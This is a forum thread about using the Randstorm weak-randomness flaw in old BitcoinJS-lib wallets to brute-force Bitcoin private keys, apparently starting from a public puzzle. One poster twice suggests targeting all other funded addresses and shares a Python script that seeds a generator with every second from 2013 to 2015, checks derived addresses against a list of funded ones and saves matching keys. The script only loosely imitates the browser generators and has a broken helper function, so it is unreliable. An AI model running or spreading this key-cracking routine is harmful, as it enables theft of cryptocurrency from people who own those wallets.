Randstorm-for-puzzle

[stilichovandal]

Hi all,

I want to present my work in process project ie, to try using Randstorm vulnerabiility for solving the puzzle.

Link to the Git repo.

https://github.com/Stilichov/Randstorm-for-puzzle

The idea is that, between 2010 and 2015, many exchanges and websites relied on BitcoinJS-lib v0.1.3 for Bitcoin wallet generation. The issue was that many browsers didn't use window.crypto.random, which led to entropy being collected from Math.random().
The Bitcoin Challenge Transaction was created in 2015, and the wallets were created with math.random()

I am still trying to replicate the vulnerable math.random() functions used in the older versions of the browser.

While the project is still work in progress, I welcome your feedback and ideas to implement the the old math.random() functions.

[nomachine]

I have already tried all possible timestamps for 32 BTC Puzzle with this method from

start_datetime = datetime(2010, 1, 1, 0, 0, 0)
end_datetime = datetime(2015, 1, 15, 19, 7, 14)

unfortunately, this puzzle was not created with that tool. 


But you can try all other BTC addresses that have a positive balance using the same method.

Good luck.

[stilichovandal]

I have already tried all possible timestamps for 32 BTC Puzzle with this method from

start_datetime = datetime(2010, 1, 1, 0, 0, 0)
end_datetime = datetime(2015, 1, 15, 19, 7, 14)

unfortunately, this puzzle was not created with that tool. 


But you can try all other BTC addresses that have a positive balance using the same method.

Good luck.

I am still working to implement math.random() as it was used in the older version of browsers.
Chrome and Firefox had slightly different methods.

Do you already have its implementation?

[nomachine]

It's very similar to what you did on github.

I don't know what I haven't tried in the last 5 years.
Thousands of scripts and experiments.
Even different random generators from here

https://github.com/schmouk/PyRandLib


Various variants for random seed. Can you imagine that i  tried UUID - uuid3() , uuid4() , uuid5()  as a random seed ?

I even physically turned back time on the PC.

[COBRAS]

It's very similar to what you did on github.

I don't know what I haven't tried in the last 5 years.
Thousands of scripts and experiments.
Even different random generators from here

https://github.com/schmouk/PyRandLib


Various variants for random seed. Can you imagine that i  tried UUID - uuid3() , uuid4() , uuid5()  as a random seed ?

I even physically turned back time on the PC.

I was try this rng

https://github.com/lemire/fastrand


And  hi find privkey 2**32 axact ac 2**32 nymbers generated


2**10 exact at 2**10 generated numbers )))))

[Kpot87]

Anybody know any site that use BitcoinJS-lib in late 2011? Can you show examples?

[nomachine]

Anybody know any site that use BitcoinJS-lib in late 2011? Can you show examples?

I don't know about 2011 but here is one from 2013 - 2015

https://web.archive.org/web/20140210085752/https://coinpunk.com/

[nomachine]

Code:

import random, sys, os
from datetime import datetime, timedelta
import time
import secp256k1 as ice

if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
t = time.ctime()
sys.stdout.write(f"\033[?25l")
sys.stdout.write(f"\033[01;33m[+] {t}\n")
sys.stdout.flush()

class SecureRandom:
    def __init__(self, seed):
        self.rng_state = None
        self.rng_pool = []
        self.rng_pptr = 0
        self.rng_psize = 32
        random.seed(seed)
        for _ in range(self.rng_psize):
            self.rng_pool.append(random.randint(0, 255))
        self.rng_pptr = 0

    def rng_get_byte(self):
        if self.rng_pptr >= len(self.rng_pool):
            self.rng_pptr = 0
            self.rng_pool = [random.randint(0, 255) for _ in range(self.rng_psize)]
        byte = self.rng_pool[self.rng_pptr]
        self.rng_pptr += 1
        return byte

    def rng_get_bytes(self, length):
        result = bytearray(length)
        for i in range(length):
            result[i] = self.rng_get_byte()
        return result

def custom_private_key_generator(rng_simulator=None):
    # If no random number generator simulator is provided, create a new one
    rng = SecureRandom()
    private_key_bytes = rng.rng_get_bytes(32)
    private_key_hex = private_key_bytes.hex()
    return private_key_hex

def generate_address(private_key):
    dec = int(private_key, 16)
    caddr = ice.privatekey_to_address(0, True, dec)
    uaddr = ice.privatekey_to_address(0, False, dec)
    return caddr, uaddr

richFile = "richFile.txt"

rl = [iu.strip() for iu in open(richFile).readlines()]
richList = set(rl)

# Specify the start and end date and times
start_datetime = datetime(2013, 11, 1, 0, 0, 0)
end_datetime = datetime(2015, 1, 15, 19, 7, 14)

# Calculate the time range in seconds
time_range_seconds = (end_datetime - start_datetime).total_seconds()

current_datetime = start_datetime

while current_datetime <= end_datetime:
    # Format the current datetime to exclude fractional seconds
    timestamp = current_datetime.strftime('%Y-%m-%d %H:%M:%S')

    # Convert the formatted timestamp to a Unix timestamp
    current_seed = int(datetime.strptime(timestamp, '%Y-%m-%d %H:%M:%S').timestamp())
    # Create a secure random number generator
    secure_rng = SecureRandom(current_seed)

    random_bytes = secure_rng.rng_get_bytes(32)
    hex_representation = random_bytes.hex()
    private_key = hex_representation

    caddr, uaddr = generate_address(private_key)
    message = "\r[+] {}, {}".format(caddr, timestamp);messages = []
    messages.append(message);output = "\033[01;33m" + ''.join(messages) + "\r"
    sys.stdout.write(output);sys.stdout.flush()
    # Check if the generated address matches
    if caddr in richList or uaddr in richList:
        wifc = ice.btc_pvk_to_wif(private_key)
        wifu = ice.btc_pvk_to_wif(private_key, False)
        with open("KEYFOUNDKEYFOUND.txt", "a") as file:
            file.write("\nPrivate Key (hex): " + private_key)
            file.write("\nPrivate key (wif) Compressed : " + wifc)
            file.write("\nPrivate key (wif) Uncompressed: " + wifu)
            file.write("\nBitcoin address Compressed: " + caddr)
            file.write("\nBitcoin address Uncompressed: " + uaddr)
            file.write(
                "\n-------------------------------------------------------------------------------------------------------------------------------------------\n"
            )

    current_datetime += timedelta(seconds=1)

You can try all possible BTC addresses with this, but I had no luck.

Everything has already been hacked that had flaws.